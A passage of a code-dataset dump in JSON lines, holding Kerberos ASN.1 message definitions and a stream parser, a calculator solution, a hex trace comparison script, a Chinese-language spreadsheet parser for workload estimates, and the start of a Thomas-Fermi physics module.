'optional':True})]\n\n\nclass KRB_ERROR(core.Sequence):\n explicit = (\n APPLICATION, 30)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'cusec', krb5int32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'stime', KerberosTime, {'tag_type':TAG, 'tag':4}),\n (\n 'susec', krb5int32, {'tag_type':TAG, 'tag':5}),\n (\n 'error-code', krb5int32, {'tag_type':TAG, 'tag':6}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':9}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':10}),\n (\n 'e-text', core.GeneralString, {'tag_type':TAG, 'tag':11, 'optional':True}),\n (\n 'e-data', core.OctetString, {'tag_type':TAG, 'tag':12, 'optional':True})]\n\n\nclass ChangePasswdDataMS(core.Sequence):\n _fields = [\n (\n 'newpasswd', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'targname', PrincipalName, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'targrealm', Realm, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass EtypeList(core.SequenceOf):\n _child_spec = ENCTYPE\n\n\nclass KerberosResponse(core.Choice):\n _alternatives = [\n (\n 'AS_REP', AS_REP, {'implicit': (APPLICATION, 11)}),\n (\n 'TGS_REP', TGS_REP, {'implicit': (APPLICATION, 13)}),\n (\n 'KRB_ERROR', KRB_ERROR, {'implicit': (APPLICATION, 30)})]\n\n\nclass KRBCRED(core.Sequence):\n explicit = (\n APPLICATION, 22)\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass KerberosParser:\n\n def __init__(self):\n pass\n\n @staticmethod\n async def from_streamreader(reader):\n lb = await read_or_exc(reader, 4)\n length = int.from_bytes(lb, byteorder='big', signed=False)\n data = await read_or_exc(reader, length)\n krb_message = AS_REQ.load(data)\n return krb_message","sub_path":"pycfiles/Responder3-0.0.1-py3.7/KerberosV5.cpython-37.py","file_name":"KerberosV5.cpython-37.py","file_ext":"py","file_size_in_byte":25564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
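A quick round-trip of one of the structures above clarifies how these asn1crypto definitions are meant to be used. This is a minimal sketch, assuming the module is importable as KerberosV5 (that import path is an assumption) and relying only on asn1crypto's documented Sequence API (dict construction, dump()/load(), .native):

from datetime import datetime, timezone
from KerberosV5 import PA_ENC_TS_ENC  # hypothetical import path for the module above

# Build the pre-auth timestamp SEQUENCE defined above and DER-encode it.
pa = PA_ENC_TS_ENC({
    'patimestamp': datetime(2021, 1, 1, tzinfo=timezone.utc),  # KerberosTime
    'pausec': 1234,                                            # optional microseconds
})
der = pa.dump()                    # DER bytes for the tagged SEQUENCE
parsed = PA_ENC_TS_ENC.load(der)   # decode them back
assert parsed['pausec'].native == 1234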
+{"seq_id":"103482644","text":"class Solution:\n def calculate(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n \n # remove spaces\n s = ''.join(s.split())\n sLen = len(s)\n\n def findNextNum(cur):\n # find the next number and move the cursor to the next position after it\n numStart = cur\n while cur < sLen and s[cur].isdigit(): cur += 1\n return (int(s[numStart:cur]), cur) if cur > numStart else None\n\n num, cur = findNextNum(0)\n if num is None: raise Exception('Invalid input.')\n stack = [num]\n\n while cur < sLen:\n op = s[cur]\n cur += 1\n num, cur = findNextNum(cur)\n\n if op == '+':\n stack.append(num)\n elif op == '-':\n stack.append(-num)\n elif op == '*':\n stack[-1] *= num\n elif op == '/':\n stack[-1] = int(stack[-1] / num)\n\n return sum(stack)","sub_path":"227 Basic Calculator II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"458330090","text":"#!/usr/local/bin/python\nimport random\nimport string\nimport os\ndef deleteDul(file_name, file_backup_name):\n f_source = open(file_name, 'r')\n f_backup = open(file_backup_name, 'w')\n tmp = \"\"\n for line in f_source:\n if line.strip('\\n') != tmp.strip('\\n'):\n f_backup.write(\"0x\" + line[25:33] + \"\\n\")\n f_backup.write(\"0x\" + line[17:25] + \"\\n\")\n tmp = line\n f_source.close()\n f_backup.close()\n\ndef matrixC2hex(file_name, file_hex_name):\n fd_source = open(file_name, 'r')\n fd_hex = open(file_hex_name, 'w')\n for line in fd_source:\n fd_hex.write(\"0x\" + format(hex(string.atoi(line.strip(\"\\n\"))).lstrip(\"0x\"),\"0>8\") + '\\n')\n fd_source.close()\n fd_hex.close()\n\ndef autoCmp(file1, file2):\n if os.path.isfile(file1) == False:\n print(file1 + \"dose not exist!\")\n return\n if os.path.isfile(file2) == False:\n print(file2 + \"dose not exist!\")\n return\n fd_1 = open(file1, 'r')\n fd_2 = open(file2, 'r')\n line1 = fd_1.readline()\n line2 = fd_2.readline()\n cnt = 0\n while line1 or line2:\n cnt = cnt + 1\n if line1 != line2:\n print(\"%30s :\" % \"Error\")\n print(\"%30s : line:%d : %s\" % (file1, cnt, line1.strip(\"\\n\")))\n print(\"%30s : line:%d : %s\" % (file2, cnt, line2.strip(\"\\n\")))\n line1 = fd_1.readline()\n line2 = fd_2.readline()\n fd_1.close()\n fd_2.close()\n\ndef main():\n result_file = \"my_wbslv_trace.dat\"\n if os.path.isfile(result_file) == False:\n print(result_file + \"dose not exist!\")\n return\n result_file_hex = result_file + \".hex\"\n deleteDul(result_file, result_file_hex)\n matrixC = \"C.txt\"\n if os.path.isfile(matrixC) == False:\n print(matrixC + \"dose not exist!\")\n return\n matrixCHex = \"C.hex\"\n matrixC2hex(matrixC, matrixCHex)\n autoCmp(matrixCHex, result_file_hex)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dsp/2/result/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"405993959","text":"#-*- coding: utf-8 -*-\n# @Time : 2020/6/16 10:03\n# @Author : Nivina\n# @Email : nivinanull@163.com\n# @File : read_attachment9.py\n\nimport numpy as np, pandas as pd\nimport os, sys, platform\nimport copy, re\nimport math\nimport datetime\nimport logging\nfrom collections import Counter\nfrom pathlib import Path\nfrom explore import get_maintenance_reqs as gmr\nimport pickle\n\npd.set_option('display.max_columns',20) #给最大列设置为10列\npd.set_option('display.max_rows',10)#设置最大可见10行\npd.set_option('mode.chained_assignment','raise') # 屏蔽SettingWithCopyWarning\n\ncurrent_year = str(datetime.datetime.now().year)\n\ncosmic_cols = ['type', 'batch', 'project_name', 'projectNO', 'requirementNO', 'requirement_name', 'requirement_detail', 'advocator',\n 'days_spent', 'coding_requirement']\n\nnoncosmic_cols = ['type', 'batch', 'project_name', 'projectNO', 'requirementNO', 'requirement_name', 'work_cat', 'work_name',\n 'work_detail', 'days_spent']\n\ntemp_noncosmic_cols = ['requirementNO', 'requirement_name', 'work_cat', 'work_name', 'work_detail', 'days_spent']\n\ncosmic_info = pd.DataFrame(columns=cosmic_cols)\n\n# 非cosmic的 人天、 工作类型、工作名称、工作内容详细描述加进去\nnoncosmic_info = pd.DataFrame(columns=noncosmic_cols)\n\n\nyear_list = [str(i + datetime.datetime.now().year) for i in range(-5, 6)]\n\n\ndef format1(item):\n # re_no = re.split('年|需求|序号|号|编号|\\d季度|季度\\d|' + current_year, item)\n if item:\n # item = ''.join(re.split('\\d季度|季度\\d|' + '|'.join(year_list), item))\n item = ''.join(re.split('[1-4]Q|Q[1-4]|[1-4]季度|季度[1-4]', item))\n re_no = re.findall(\"\\d+\", item)\n if len(re_no) >= 1:\n re_no = set(re_no) - set(year_list)\n if len(re_no) == 1:\n int_nu = int(re_no.pop())\n return int_nu\n return None\n\n\ndef format2(item):\n if item:\n re_no = re.findall(r\"\\d+\", item)\n re_no = [x for x in re_no if x not in year_list]\n if len(re_no) >= 1:\n for n in re_no:\n if n == item:\n return None\n m = re.search('^(.*需求.*?|.*序号.*?|.*编号.*?|)' + n, item)\n if m:\n matched = m.group(0)\n if ('合计' in matched) or (('共'+ n in item) or (n + '个' in item) or (n + '需求' in item) and len(item) <= 8):\n return None\n name = ''\n try:\n name = re.split(':|:|' + matched, item)\n except Exception as e:\n return None\n name = ''.join(name)\n if not name:\n return None\n return int(n), name\n return None\n\n\ndef get_cosmic_info(cosmic_sheet):\n temp_info = pd.DataFrame(columns=cosmic_cols)\n part1 = cosmic_sheet[cosmic_sheet.iloc[:, 0].astype(str).str.strip() == '需求序号'].reset_index()\n index_stride = list(part1['index'])\n index_stride.append(cosmic_sheet.shape[0])\n # temp_info['start'] = index_stride[:-1]\n # temp_info['end'] = index_stride[1:]\n index_stride = [{'start':index_stride[i], 'end':index_stride[i + 1]} for i in range(len(index_stride) - 1)]\n temp_info['index_stride'] = index_stride\n part1 = part1.drop(columns='index').dropna(axis=1) ###去重空字段\n if part1.empty:\n return False, 'ERROR: 《表2 需求开发工作量核算表》没有找到需求序号'\n requirement_count = part1.shape[0]\n\n if part1.shape[1] > 4:\n part1 = part1.T.drop_duplicates().T\n if part1.shape[1] == 4 and not (part1.iloc(axis=1)[1].astype(str).str.strip() == '').any():\n temp_info['requirementNO'] = part1.iloc[:, 1].astype(str)\n temp_info['requirementNO'] = temp_info['requirementNO'].map(format1)\n if temp_info['requirementNO'].isnull().any():\n return False, 'ERROR: 请检查《表2 需求开发工作量���算表》需求序号填写信息是否满足:xxxx年需求序号xxxx 的格式'\n else:\n return False, 'ERROR: 请检查《表2 需求开发工作量核算表》需求序号、需求名称格式'\n\n # 找到需求名称列且需求名称不能为空\n b1 = (part1.iloc[:, 2].str.strip() == 
'需求名称').all()\n b2 = (part1.iloc(axis=1)[3].str.strip() == '').any()\n if b1 and not b2:\n temp_info['requirement_name'] = part1.iloc[:, 3]\n else:\n return False, 'ERROR: 请检查《表2 需求开发工作量核算表》需求名称是否存在'\n part2 = cosmic_sheet[cosmic_sheet.iloc(axis=1)[0].str.strip() == '需求提出人'].reset_index()\n if part2.empty:\n print('WARNING: 《表2 需求开发工作量核算表》 没有找到需求提出人相关行' + '\\n', str(file_path))\n temp_info['advocator'] = '无'\n temp_info['days_spent'] = -1\n else:\n part2.drop(columns=[i for i in part2.columns if part2[i].isna().all()], inplace=True)\n if part2.shape[0] == requirement_count and part2.shape[1] >= 5:\n temp_info['advocator'] = part2.iloc[:, 2].fillna('无').astype(str)\n no_advocator = list(temp_info[temp_info.advocator == '无'].requirementNO)\n if len(no_advocator) > 0:\n print('WARNING: 《表2 需求开发工作量核算表》 <需求提出人> 存在漏填\\t' + '需求编号为:' + str(no_advocator) + '\\n', str(file_path))\n\n if (part2.iloc[:, 3].astype(str).str.strip().map(lambda x: True if '实际工作量' in x else False)).all():\n # print('part2.iloc[:, 4]_before ' * 8 + '\\n', list(part2.iloc[:, 4]))\n part2.iloc[:, 4].fillna(-1, inplace=True)\n temp_info['days_spent'] = part2.iloc(axis=1)[4].astype(str).map(lambda x: re.findall(\"\\d+\", x)[0] if (len(re.findall(\"\\d+\", x)) == 1) else -1).astype(float)\n # print('part2.iloc[:, 4]_after ' * 8 + '\\n', list(temp_info['days_spent']))\n located_nan2 = list(temp_info[temp_info.days_spent == -1]['requirementNO'].values)\n if len(located_nan2) > 0:\n print('WARNING: 《表2 需求开发工作量核算表》 <实际工作量> 存在漏填\\t', '需求序号为:' + str(located_nan2) + '\\n', str(file_path))\n else:\n temp_info['days_spent'] = -1\n print('WARNING: 《表2 需求开发工作量核算表》 无法定位 <实际工作量> 相关信息' + '\\n', str(file_path))\n else:\n print('WARNING: 《表2 需求开发工作量核算表》需求提出人相关行\\n' +\n '1.需求名称 相关行行数必须与需求序号条数保持一致'\n '2.是否满足<需求提出人、实际工作量(人天)、需求预估工作量(人天)> 格式' + '\\n',\n str(file_path))\n temp_info['advocator'] = '无'\n temp_info['days_spent'] = -1\n\n part3 = cosmic_sheet[cosmic_sheet.iloc[:, 0].str.strip() == '需求描述'].reset_index(drop=True)\n if part3.empty:\n return False, 'ERROR: 《表2 需求开发工作量核算表》 没有找到需求描述'\n part3.iloc(axis=1)[2].fillna('', inplace=True)\n part3.dropna(inplace=True, axis=1)\n\n if part3.shape[0] == requirement_count:\n temp_info['requirement_detail'] = part3.iloc[:, 1]\n else:\n return False, 'ERROR: 《表2 需求开发工作量核算表》提交的需求缺少需求详情'\n\n coding_selection = ['代码', '代码开发', '数据脚本', '数据配置']\n coding_requirement_indices = cosmic_sheet[cosmic_sheet.iloc[:, 0].str.strip().isin(coding_selection)].index\n if coding_requirement_indices.empty:\n return False, 'ERROR: 该项目没有代码开发信息'\n coding_requirement_indices = [coding_requirement_indices[0]] + \\\n [coding_requirement_indices[i] for i in range(1, len(coding_requirement_indices))if ((coding_requirement_indices[i] - coding_requirement_indices[i-1]) > 1)]\n\n coding_requirement_indices.extend([(i+1) for i in coding_requirement_indices] + [(i+2) for i in coding_requirement_indices])\n coding_requirement = cosmic_sheet.iloc[coding_requirement_indices, :]\n coding_requirement = coding_requirement.drop(columns=[i for i in coding_requirement.columns if coding_requirement[i].isna().all()])\n\n if len(coding_requirement.columns) < 2:\n temp_info['coding_requirement'] = np.nan\n else:\n coding_requirement = coding_requirement.loc[(coding_requirement.iloc(axis=1)[1].astype(str).str.contains('功能'))\n & (coding_requirement.iloc(axis=1)[1].astype(str).str.contains('列表'))]\n\n if coding_requirement.shape[0] != len(coding_requirement_indices) / 3:\n print('功能点名称列表 doesnt match 代码开发' + '\\n', str(file_path), '\\n', '代码开发->功能点名称 
相关行数:',\n coding_requirement.shape[0], '代码开发相关行数:', int(len(coding_requirement_indices) / 3))\n coding_requirement = coding_requirement.iloc(axis=1)[1:3]\n coding_requirement.iloc(axis=1)[1].fillna('无', inplace=True)\n coding_requirement_list = []\n if not coding_requirement.empty:\n coding_requirement.columns = ['name', 'detail']\n coding_requirement.reset_index(inplace=True)\n for r in temp_info['index_stride']:\n value = coding_requirement[coding_requirement['index'].between(r['start'], r['end'])].detail.values\n if value and (str(value[0]).strip() != '无') and (str(value[0]).strip() != '不涉及'):\n coding_requirement_list.extend(value)\n else:\n # 没有找到<代码开发>相关行\n coding_requirement_list.append(np.nan)\n else:\n coding_requirement_list = [np.nan] * requirement_count\n temp_info['coding_requirement'] = coding_requirement_list\n\n if temp_info.coding_requirement.hasnans:\n suspicious_req = temp_info.requirementNO[temp_info.coding_requirement.isna()]\n print('WARNING -- 发现没有<代码描述>的cosmic需求,序号:',suspicious_req.values, '\\n', str(file_path))\n\n temp_info.drop(columns=['index_stride'], inplace=True)\n temp_info['batch'] = batch_from_cat ### current_batch\n # print('temp_info_last '* 5 + '\\n', temp_info)\n\n return True, temp_info\n\n\n# temp_noncosmic_cols = ['requirementNO', 'requirement_name', 'work_cat', 'work_name', 'work_detail', 'days_spent']\ndef get_noncosmic_info(noncosmic_sheet):\n temp_info = pd.DataFrame(columns=temp_noncosmic_cols)\n noncosmic_result = pd.DataFrame()\n if (noncosmic_sheet.iloc[:, 0] == '项目序号').any():\n start = (noncosmic_sheet[noncosmic_sheet.iloc[:, 0] == '项目序号']).index.values[0]\n noncosmic_sheet = noncosmic_sheet[start:]\n info_count = 0\n for i in range(noncosmic_sheet.shape[1]):\n # 找到文件非cosmic信息的有效开始部分\n if str(noncosmic_sheet.iloc[0, i]).strip() == '需求序号':\n temp_info['requirementNO'] = noncosmic_sheet.iloc[1:, i].astype(str)\n info_count += 1\n elif str(noncosmic_sheet.iloc[0, i]).strip() == '需求名称':\n temp_info['requirement_name'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '非COSMIC人天' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['days_spent'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作类型' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_cat'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作名称' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_name'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作内容详细描述' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_detail'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n if info_count != 6:\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>的【需求序号、需求名称、非COSMIC人天、工作类型、工作名称、工作内容详细描述】是否完整'\n\n # 判断字段内容是否缺失,处理字段格式,需求序号统一处理成int,与cosmic部分保持一致\n temp_info.reset_index(drop=True, inplace=True)\n temp_info['requirementNO'] = temp_info['requirementNO'].map(format1)\n\n # 只取非cosmic信息的有效部分,过滤掉无效的尾部信息\n temp_info = temp_info[\n temp_info['work_cat'].notnull() & temp_info['work_name'].notnull() & temp_info['work_detail'].notnull() & temp_info['days_spent'].notnull()]\n if temp_info.empty:\n return False, 'ERROR:请检查<表4 非COSMIC评估工作量填报表>中【工作种类,工作名称,工作细节】能否被正确识别或为空'\n temp_info.update(temp_info[['requirementNO', 'requirement_name']].fillna(method='ffill'))\n # 检查requirementNO是否仍旧存在空值\n if temp_info['requirementNO'].isnull().any():\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中需求序号是否存在漏填'\n temp_info['requirementNO'] = temp_info['requirementNO'].astype(int)\n temp_info['days_spent'] = temp_info['days_spent'].astype(float)\n # 防止需求序号漏填、错填 导致的需求丢失\n if 
len(set(temp_info['requirementNO'].astype(str) + temp_info['requirement_name'])) != len(set(temp_info['requirementNO'])):\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中的需求序号、需求名称是否存在漏填或错填'\n for requirementNO, part in temp_info.groupby(['requirementNO']):\n if len(set(part['days_spent'].dropna().to_list())) == 1:\n temp = pd.DataFrame()\n temp['requirementNO'] = [requirementNO]\n temp['requirement_name'] = [part['requirement_name'].iloc[0]]\n temp['days_spent'] = [set(part['days_spent'].dropna().to_list()).pop()]\n temp['work_cat'] = [part['work_cat'].to_list()]\n temp['work_name'] = [part['work_name'].to_list()]\n temp['work_detail'] = [part['work_detail'].to_list()]\n noncosmic_result = noncosmic_result.append(temp, ignore_index=True)\n noncosmic_result.requirementNO = noncosmic_result.requirementNO.astype(int)\n else:\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中的 非COSMIC人天 填写是否正确(同一个需求只能对应一个)'\n return True, noncosmic_result\n else:\n return False, 'ERROR: 无法定位<表4 非COSMIC评估工作量填报表>中的项目序号'\n\n\ndef get_requirements(sketch):\n temp = pd.DataFrame()\n project_name_list = []\n project_name = ''\n for r in range(3):\n for c in range(sketch.shape[1]):\n if str(sketch.iloc[r, c]).strip() == '项目名称':\n project_name_list = sketch.iloc[(r+1):, c].to_list()\n elif type(sketch.iloc[r, c]) == str and sketch.iloc[r, c].strip() == '需求名称':\n temp = sketch.iloc[(r+1):, c].astype(str)\n if temp.empty:\n return False, temp, 'ERROR, 定位不到<表1 工作量核算表 >中的需求名称'\n\n project_name_list = [x for x in project_name_list if type(x) == str and x.strip() != '合计' and x.strip() != '']\n if len(project_name_list) == 0:\n return False, temp, 'ERROR, 检查<表1 工作量核算表 >中的【项目名称】是否填写正确'\n project_name_list = re.split(':|:', project_name_list[0])\n if '项目序号' in project_name_list[0]:\n del(project_name_list[0])\n project_name = ''.join(project_name_list)\n else:\n project_name = ''.join(project_name_list)\n temp = temp.map(format2).dropna()\n if temp.empty:\n return False, temp, 'ERROR, 请检查<表1 工作量核算表 >中的需求名称是否满足{需求序号XXX:需求名称}的命名方式'\n temp = pd.DataFrame(temp.values, columns=['origin'])\n temp['requirementNO'] = [x[0] for x in temp.origin.values]\n temp['requirement_name'] = [x[1] for x in temp.origin.values]\n temp.drop(columns=['origin'], inplace=True)\n return True, temp, project_name\n\n\ndef read_cosmic_sheet(all, s2_key):\n s2 = all[s2_key]\n if s2.empty:\n return False, 'ERROR:请检查文件的《表2 需求开发工作量核算表》信息'\n else:\n return get_cosmic_info(s2)\n\n\ndef read_noncosmic_sheet(all, s4_key):\n\n if s4_key:\n s4 = all[s4_key]\n if s4.empty:\n return False, 'ERROR:请检查文件的《表4 非COSMIC评估工作量填报表》信息'\n else:\n return get_noncosmic_info(s4)\n else:\n return False, 'ERROR:请检查文件的《表4 非COSMIC评估工作量填报表》是否存在'\n\n\ndef check_nonfiles(noncosmic_result):\n for f in filenames:\n if ('非COSMIC' in f or '非COSMIC'.lower() in f) and not f.startswith('.') and ('__MACOSX' not in folderName):\n local_path = Path(folderName) / f\n try:\n sheet = pd.read_excel(local_path, sheet_name=None, header=None)\n key = list(sheet.keys())[0]\n Another_chance, noncosmic_result = read_noncosmic_sheet(sheet, key)\n return Another_chance, noncosmic_result\n except Exception as error:\n print('ERROR:读取文件出错——请检查文件: ' + str(local_path) + '\\n', error)\n return False, noncosmic_result\n\n\ndef persist(df, path):\n if (df['type'] == 'cosmic').all():\n file_persist = path / 'cosmic_info.pkl'\n elif (df['type'] == 'noncosmic').all():\n file_persist = path / 'noncosmic_info.pkl'\n\n if file_persist.is_file():\n his = pd.read_pickle(file_persist)\n his.append(df, ignore_index=True)\n 
his.to_pickle(file_persist)\n else:\n file_persist.parent.mkdir(exist_ok=True)\n df.to_pickle(file_persist)\n\n\nif platform.system() == 'Windows':\n # path = Path('C:\\\\ChinaMobile\\\\cosmic_files')\n path = Path('C:\\\\ChinaMobile\\\\cosmic_files\\\\20201218部门内工作量评审')\nelse:\n path = Path('./cosmic_files')\n\nfile_count = 0\nsketch_have_read = 0\ncosmic_have_read = 0\nnoncosmic_have_read = 0\n# 储存目录\npersist_path = Path('./data/20201218')\n# persist_path = Path('./data')\nfor folderName, subfolders, filenames in os.walk(path):\n temp_copy = copy.deepcopy(subfolders)\n for sf in temp_copy:\n if sf.startswith('.'):\n subfolders.remove(sf)\n for filename in filenames:\n # 避免重复读取或者临时文件 或者苹果系统格式的文件\n if ('工作量核算' in filename) and not filename.startswith('.') and ('__MACOSX' not in folderName):\n file_path = Path(folderName) / filename\n # 用于保存在需求中的文件路径\n file_trail = str(file_path).replace(str(path) + os.sep, '')\n # 去除文件名中的特殊字符\n filename = re.sub(\"[\\s+\\.\\!\\/\\:_,$%^*(+\\\"\\']+|[+——!,。?、:~@#¥%……&*()]+\", \"\", filename)\n # 正则匹配1000-2999年季度\n batch_re_str = '[12][0-9]{3}[Q|q][1-4]'\n batch_from_cat = re.search(batch_re_str, str(file_path))\n if not batch_from_cat:\n print('ERROR:无法从文件中获取batch信息,请检查文件目录 ')\n sys.exit()\n else:\n batch_from_cat = batch_from_cat[0]\n projectNO = '-1'\n # 从文件名中获取项目序号信息\n s = re.search('项目序号\\d+', filename)\n if s:\n matched = s.group(0)\n projectNO = re.findall(\"\\d+\", matched)\n if len(projectNO) == 1:\n projectNO = projectNO[0]\n # else:\n # print('ERROR:请检查文件名称是否满足《附件9:工作量核算表(结算)-项目序号xxx.xls》的文件格式\\n' + str(file_path))\n # continue\n # else:\n # print('ERROR:请检查文件名称是否满足《附件9:工作量核算表(结算)-项目序号xxx.xls》的文件格式\\n' + str(file_path))\n # continue\n s1_key, s2_key, s4_key = '', '', ''\n try:\n all = pd.read_excel(file_path, sheet_name=None, header=None)\n except Exception as error:\n print('ERROR:读取文件出错——请检查文件:' + str(file_path) + '\\n', error)\n continue\n\n file_count += 1\n if len(list(all.keys())) >= 4 and '非COSMIC' in list(all.keys())[3]:\n s1_key = list(all.keys())[0]\n s2_key = list(all.keys())[1]\n s4_key = list(all.keys())[3]\n elif len(list(all.keys())) >= 2:\n s1_key = list(all.keys())[0]\n s2_key = list(all.keys())[1]\n else:\n print('ERROR:请检查文件的《表2 需求开发工作量核算表》是否存在\\n' + str(file_path))\n continue\n\n # sheet1部分处理\n s1 = all[s1_key]\n FLAG, requirements_result, project_name = get_requirements(s1)\n if FLAG:\n sketch_have_read += 1\n else:\n print('requirements_result_fail_to_read'* 5 + '\\n', project_name, '\\n', requirements_result, '\\n', str(file_path))\n continue\n\n # sheet2、sheet4部分\n FLAG1, cosmic_result = read_cosmic_sheet(all, s2_key)\n if not FLAG1:\n print(cosmic_result, '\\n', str(file_path))\n else:\n cosmic_result['type'] = 'cosmic'\n cosmic_result['batch'] = batch_from_cat\n cosmic_result['projectNO'] = projectNO\n cosmic_result['project_name'] = project_name\n cosmic_result['file_trail'] = file_trail\n cosmic_result.drop_duplicates(subset=['requirement_name'], inplace=True)\n cosmic_info = cosmic_info.append(cosmic_result, ignore_index=True)\n cosmic_have_read += 1\n\n FLAG2, noncosmic_result = read_noncosmic_sheet(all, s4_key)\n if not FLAG2:\n if check_nonfiles(noncosmic_result)[0]:\n FLAG2, noncosmic_result = check_nonfiles(noncosmic_result)\n noncosmic_result['type'] = 'noncosmic'\n noncosmic_result['batch'] = batch_from_cat\n noncosmic_result['projectNO'] = projectNO\n noncosmic_result['project_name'] = project_name\n noncosmic_result['file_trail'] = file_trail\n noncosmic_result.drop_duplicates(subset=['requirement_name'], 
inplace=True)\n noncosmic_info = noncosmic_info.append(noncosmic_result, ignore_index=True)\n noncosmic_have_read += 1\n else:\n print(noncosmic_result, '\\n', str(file_path))\n\n else:\n noncosmic_result['type'] = 'noncosmic'\n noncosmic_result['batch'] = batch_from_cat\n noncosmic_result['projectNO'] = projectNO\n noncosmic_result['project_name'] = project_name\n noncosmic_result['file_trail'] = file_trail\n noncosmic_result.drop_duplicates(subset=['requirement_name'], inplace=True)\n noncosmic_info = noncosmic_info.append(noncosmic_result, ignore_index=True)\n noncosmic_have_read += 1\n\n\n # 判断表2、表4的需求是否和表1的需求一致\n set_union = set()\n if (FLAG1 and FLAG2):\n set_union = set(cosmic_result.requirementNO) | set(noncosmic_result.requirementNO)\n elif FLAG1:\n set_union = set(cosmic_result.requirementNO)\n\n elif FLAG2:\n set_union = set(noncosmic_result.requirementNO)\n\n if set(requirements_result.requirementNO) == set_union:\n continue\n else:\n print('WARNING:sheet2与sheet4的需求总集合与sheet1的需求集合不符\\n',\n 'sheet2与sheet4的需求总集合:\\n', set_union, '\\n',\n 'sheet1需求集合:\\n',set(requirements_result.requirementNO), '\\n',\n str(file_path))\n\n\nprint('检索到文件:' + str(file_count))\nprint('成功读取工作量核算汇总表的文件:' + str(sketch_have_read))\nprint('成功读取cosmic信息的文件:' + str(cosmic_have_read))\nprint('成功读取非cosmic信息的文件' + str(noncosmic_have_read))\n# ####################读取结果简单打印查看\nprint('results_over_here ' * 8 + '\\n', cosmic_info)\nprint(noncosmic_info)\n\n# #####################csv格式的文件用于查看读入需求\n# cosmic_info.to_csv(persist_path / 'cosmic.csv')\n# noncosmic_info.to_csv(persist_path / 'noncosmic.csv')\n\n# ##################### 需求信息持久化\n# ##################### 运行多次会导致将该次读取的数据多次追加,请确认同一批次的需求只持久化一次\npersist(cosmic_info, persist_path)\npersist(noncosmic_info, persist_path)\n\n\n# #####################运维需求读取\ndef read_maintenance_reqs():\n maintenance_reqs_source = Path('C:\\\\ChinaMobile\\\\maintenance_requirements')\n maintenance_reqs_target = Path('./data')\n get_reqs_obj = gmr.GetMaintenanceReqs(maintenance_reqs_source, maintenance_reqs_target)\n maintenance_reqs = get_reqs_obj.read_files()\n print(maintenance_reqs)\n # ################# 预检查是否存在需求填写重复\n get_reqs_obj.duplicate_check()\n # ################# 数据持久化,运行多次会导致将该次读取的数据多次追加,请确认同一批次的需求只持久化一次\n get_reqs_obj.persist()\n\n\n# ######################一并读取运维需求\n# read_maintenance_reqs()","sub_path":"explore/read_attachments.py","file_name":"read_attachments.py","file_ext":"py","file_size_in_byte":26479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"283565402","text":"# Module to solve the Thomas-Fermi problem in 1D\n\nimport numpy as np\n\ndef create_K_matrix(x, E_scale=1.0, sigma=1.0, x_0 = 1.0):\n '''\n Input: \n x : discrete 1D grid\n E_scale : energy scale for the K matrix, default units is eV\n sigma : impact paramter to prevent blow up at the same point\n Output:\n K : matrix of size x.size times x.size\n\n K(x1,x2) = E_scale / sqrt((x1 - x2)^2 + sigma^2)\n '''\n r = np.abs(x[:,np.newaxis] - x)\n K = E_scale/np.sqrt(r**2 + sigma**2)*np.exp(-r/x_0)\n return K\n \ndef create_A_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info):\n '''\n Convinience function\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mask : array specifying the nature of each point 'l1','d','b' or 'l2'\n dot_info : information about number of dots and their start and end points\n Output:\n A : matrix A used in solution of TF, A z = b \n '''\n\n #set up the A matrix\n N_grid = len(x)\n # 2 are leads\n N_D = len(dot_info)\n N_islands = N_D + 2\n \n N_bar = len(filter(lambda x: x == 'b',mask))\n N_A = N_grid + N_islands + N_bar\n A = np.zeros([N_A,N_A])\n\n A[:N_grid,:N_grid] = K\n # bottom left part\n B = np.zeros((N_D,N_grid))\n # constraint for sum of electron density over a dot\n for i in range(N_D):\n B[i,dot_info[i][0]:dot_info[i][1] + 1] = 1\n\n # set the sum and mu_dot constraint equations\n A[N_grid:N_grid + N_D,:N_grid] = B\n A[:N_grid,N_grid:N_grid + N_D] = 